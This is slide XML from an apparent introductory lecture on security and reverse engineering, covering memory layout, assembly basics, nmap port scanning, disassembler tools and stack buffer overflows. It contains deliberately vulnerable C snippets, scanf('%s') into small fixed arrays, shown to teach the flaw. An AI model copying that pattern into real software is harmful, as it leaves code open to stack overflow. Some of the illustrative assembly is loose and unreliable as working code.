        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2646203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6068-0772-41BE-AB4F-AF61F8AB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F386C-C278-4BE5-A0DA-9CFFBBDA9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 in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grows upward</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global variables, arrays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ex: malloc();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932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65BE367-62D8-4A73-8026-4FD0604FC3DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977021" y="3408106"/>
            <a:ext cx="1283677" cy="415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D2BD05-FF14-4DB5-B1C8-EC00F8599EF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977021" y="2609326"/>
            <a:ext cx="1283677" cy="37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280BA8-C7C6-45E6-BE6B-FA4549A0598E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971163" y="1864916"/>
            <a:ext cx="1283677" cy="37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1190C9D-6C7D-472B-BBF3-FFDA8E5181C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="968229" y="1035507"/>
            <a:ext cx="1283677" cy="37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https://lh3.googleusercontent.com/GnjT-GlWmF5G0oz2OS8l-CJ1s30oOnb0QuJI8ceoRpu3gOBlgkIFxV7a5fDzt4b4uz_1qOZhw1P2MiAW0Vj6xrjRVrZs_xvU1ZhYzAN6PQx5jJ4lE4ZECsoEW-NLOins80KUlB_7Tv4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA5EFD4-9449-4AC9-AB9C-770997178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355" y="747287"/>
            <a:ext cx="6976188" cy="380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CE9B16-8939-4323-AC9A-E1C171737CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2796355" y="4910384"/>
            <a:ext cx="91381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Opcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: your instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Operands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: what will be used or operated on, like parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Register</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: space in memory that stores temporary values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: place in memory where the instruction resides</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"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6E6C25-7429-4841-A738-D96FB1B1261F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038567" y="1028702"/>
            <a:ext cx="127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CFF9D0-8636-440A-A9B2-9DE87F76E893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977021" y="1864916"/>
            <a:ext cx="1274885" cy="37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Operand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6E27CE-8344-493C-8A04-576E14E9BD51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="968229" y="2609326"/>
            <a:ext cx="1274885" cy="37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Register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C85958-56EA-4026-A86E-FAF0DFAC7876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="968229" y="3429000"/>
            <a:ext cx="1292469" cy="37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4623BA0-8F38-4ECD-9382-031F5414A083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1116623"/>
            <a:ext cx="603738" cy="64183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79359CC-ED6A-4882-B88E-A873835A311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180492" y="1213368"/>
            <a:ext cx="3915508" cy="224175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74A3145-8B1A-4724-A157-3366D4F32CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884378" y="2540978"/>
            <a:ext cx="940776" cy="2286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449AD94-C2F0-47D4-A35B-A7E331DF9BCD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2251906" y="2053980"/>
            <a:ext cx="4632472" cy="601298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5D6235A-4B7E-4C1B-8CC7-25DA146F1444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884378" y="3121269"/>
            <a:ext cx="720968" cy="30773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395478B-6DBF-424D-BFE9-1D3C6A66B387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243114" y="2798390"/>
            <a:ext cx="4641264" cy="473325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A7350B2-B2E4-412D-A5A6-0A3FC1F1C663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2796355" y="3613638"/>
            <a:ext cx="1766853" cy="34833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94871DA-3443-490A-85E6-3DF29814E6F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605346" y="3745523"/>
            <a:ext cx="1573823" cy="3429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A0F3878-F5CE-4581-B764-8F8425FF95A4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>
            <a:off x="4563208" y="3787805"/>
            <a:ext cx="3042138" cy="129168"/>
          </a:xfrm>
          <a:prstGeom prst="bent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3" name="Connector: Elbow 3072">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7EAE8EB-2FE9-467E-9D00-DD6DAB3C1849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2260698" y="3618064"/>
            <a:ext cx="535657" cy="169741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543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D00B-3127-4F23-9748-828B591D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4D464-81A0-44E5-88E6-9F4FD33C7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539" y="2524372"/>
            <a:ext cx="1702546" cy="3416300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mov</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>push</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/...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CBA269-DD26-4F90-B4FE-2DEC9868B31D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804747" y="2422129"/>
            <a:ext cx="8915399" cy="3259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3600"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copies the value of the second operand to the first</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compares the values of the first and second operand</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds values and saves it in the first operand</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Calls a function</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stores the register’s value into the top of the program’s memory block</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Takes out the value on top of the memory block and stores it into the register</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jumps to a different part of the code (if conditions are satisfied)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166459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3350B3F-A1C6-4500-A854-08A7AAB46BCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="729762"/>
            <a:ext cx="3393795" cy="659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852A9-7C13-4FFA-A44D-3C76F7F1B72F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378070" y="1790655"/>
            <a:ext cx="30157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function(int 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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	return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	int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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	int j;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	j = function(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return j;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A79E4D-F525-4E0F-B131-182E6BD5BA3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378071" y="879231"/>
            <a:ext cx="252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- code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74EB7C-17D4-4E59-B276-A1E9A8290F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3727940" y="0"/>
            <a:ext cx="0" cy="685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D549DC0-8B3D-40B5-99CD-3FBD11873A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3727940" y="729761"/>
            <a:ext cx="3393795" cy="659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E4F989-B43E-48F4-A52C-14831D02820C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163141" y="874834"/>
            <a:ext cx="252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Assembly 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1BDE4B-3ED5-41BD-9CF3-D7DDE04DBC4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4211486" y="1688789"/>
            <a:ext cx="58204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main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>push 	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/>
              <a:t>mov 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sub 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0x20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mov	[rsp-0x10], 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mov	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, [rsp-0x10] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>call 	function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ret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/>
              <a:t>function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>push	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/>
              <a:t>mov 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sub		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0x18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mov 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, [rsp-0x10]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ret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1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014F-6442-4225-9806-9F12A8EB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scanning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842E5-E77C-4B40-8238-C4F84DAF1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20298"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common starting point for most penetration tests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Reveals attack vectors and possible connections to a server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not illegal but you can get in trouble with your ISP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Works by sending a packet to each port and waiting for a response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap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7B834E-A852-4868-8F90-12392345C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8" y="2305050"/>
            <a:ext cx="2470150" cy="247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47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C9158-EFB5-46A3-B716-D5ACC19D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some tools!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08DA9-0229-4571-88BE-959E44CBF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err="1"/>
              <a:t>Objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> – the quick disassembler</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1027587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A2F315E-6E8A-4E9E-8F3E-573FF86D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some tools!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F10904-6D4E-4FD7-82D8-2BE7E9ECD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err="1"/>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> – the cool new NSA tool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3136784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B6FC5-5169-40AD-84CC-112076CF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some tools!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08D72-D153-419C-B0FC-3204E6358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IDA Pro – This one costs $5,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="499719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ED3728-A50A-43EC-A59E-4351292C0A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37"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539274" y="988170"/>
            <a:ext cx="6652726" cy="58698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5B1A9D-2CC3-484D-8763-4AEA01CE1F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5" r="11932"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="988170"/>
            <a:ext cx="6400800" cy="586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30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B6FC5-5169-40AD-84CC-112076CF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some tools!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08D72-D153-419C-B0FC-3204E6358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x64dbg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4285616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15AA0C-C250-4069-830E-E3F97B5DD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825"/>
            <a:ext cx="12192000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400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38DB9-5A28-4AA3-A5B2-91EF2210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Exploitation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359F5-EE2E-48B6-B15E-F56DCEEB1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bugs and vulnerabilities in software running on a remote server to gain control of the host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well-known techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27671266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BBB8B-FCE2-4B9E-A5F1-4B8F0128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C3556-FBB9-42C6-B516-038561152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74899"/>
            <a:ext cx="8825659" cy="4395177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We create an array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userInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This array holds 9 characters in the stack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start reading in input from the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“%s”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>userInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What’s wrong with this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User can input as many characters as they want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program writes all of their input into the stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrites the data in the stack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0525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852B4F7-4302-468E-8136-015D9DD9CC20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820638" y="1379438"/>
            <a:ext cx="26712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function1 (int a) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	char x[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	char y; 	</a:t>
            </a:r>
          </a:p>
          <a:p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(“%s”, x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}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834A36-2CEF-4B3D-8E41-8950F9A39BB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042239" y="1379284"/>
            <a:ext cx="3440485" cy="500605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9BA1A9-127B-4ADC-9831-CD52BDAFD1ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8862646" y="1379284"/>
            <a:ext cx="0" cy="27871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29957BD-52A7-418A-AB8A-1405617D10DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5222631" y="580292"/>
            <a:ext cx="293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2E9409-D7B7-491C-ACEB-328271BD32C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1652954" y="578677"/>
            <a:ext cx="155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B7DD20-880F-42E5-B7A0-AF264EC8614D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042239" y="1379284"/>
            <a:ext cx="3440485" cy="46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A31E95-4729-47E2-B0D6-9F9E2C12C591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036382" y="1892172"/>
            <a:ext cx="3440485" cy="46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1594A7-63CB-46DC-B9D7-27A9DC52322A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5048096" y="2396268"/>
            <a:ext cx="3440485" cy="46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9800E9-6B33-412D-8E94-7238418B4591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5048096" y="2910984"/>
            <a:ext cx="3440485" cy="46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86308A-5A20-4A4B-A88D-647B4FCA990C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5045167" y="3422032"/>
            <a:ext cx="3440485" cy="46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A3A035-04CF-43BC-BBD4-D1BBCEE0999C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855678" y="1428168"/>
            <a:ext cx="204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value of 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6AF04D-51E0-4814-98B7-4BBDFB36E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5584184" y="2410882"/>
            <a:ext cx="291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previous base pointer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4E3BB1-4D9D-40A9-A9C8-29088009F0B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5831456" y="1918553"/>
            <a:ext cx="204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return address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B3B3D0-B3BB-457D-943C-17E052BFE06A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5584184" y="2941280"/>
            <a:ext cx="251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value of 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11F18F-A5C3-4BEF-B91D-60C48F713D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5717931" y="3422032"/>
            <a:ext cx="218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value of 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BD874A-221B-4C3D-950E-3B6B587092EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8703016" y="922028"/>
            <a:ext cx="83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0xFFF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EA1762-75E0-4A19-9DB6-E37EF377BF26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
